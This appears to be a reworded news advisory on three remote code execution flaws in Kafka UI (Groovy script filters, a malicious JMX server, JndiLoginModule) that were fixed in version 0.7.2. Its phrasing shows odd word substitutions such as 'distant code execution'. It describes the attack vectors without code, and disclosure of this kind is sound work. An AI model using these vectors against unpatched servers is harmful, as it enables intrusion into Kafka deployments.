Critical RCE Vulnerabilities Discovered in Kafka UI

Researchers have uncovered three crucial distant code execution (RCE) vulnerabilities in Kafka UI, an open supply internet software used for managing and monitoring Apache Kafka clusters, in accordance with The GitHub Weblog. These vulnerabilities have been addressed within the newest launch, model 0.7.2, and customers are strongly inspired to replace their programs to mitigate potential exploits.

CVE-2023-52251: RCE through Groovy Script Execution

The primary vulnerability, recognized as CVE-2023-52251, leverages the message filtering performance inside Kafka UI. Attackers can use the GROOVY_SCRIPT filter sort to execute arbitrary Groovy scripts, resulting in potential RCE. The exploit will be initiated by way of a easy HTTP GET request, making it extremely accessible. The vulnerability was reported in November 2023 and patched in April 2024.

CVE-2024-32030: RCE through JMX Connector

The second vulnerability, CVE-2024-32030, includes the Java Administration Extensions (JMX) connector utilized by Kafka UI to watch Kafka brokers. If the dynamic.config.enabled setting is activated, attackers can configure Kafka UI to connect with a malicious JMX server, resulting in deserialization assaults. This vulnerability was additionally fastened within the 0.7.2 launch.

CVE-2023-25194: RCE through JndiLoginModule

The third vulnerability, CVE-2023-25194, exploits the JndiLoginModule for authentication. Attackers can manipulate cluster properties to set off RCE. This situation is simply exploitable if the dynamic.config.enabled property is about to true. The repair was included within the 0.7.2 launch, prohibiting using the JndiLoginModule.

Kafka UI customers are suggested to improve to model 0.7.2 to safe their programs towards these crucial vulnerabilities. The fixes embrace updating dependencies and including stricter controls to forestall potential exploits.

Picture supply: Shutterstock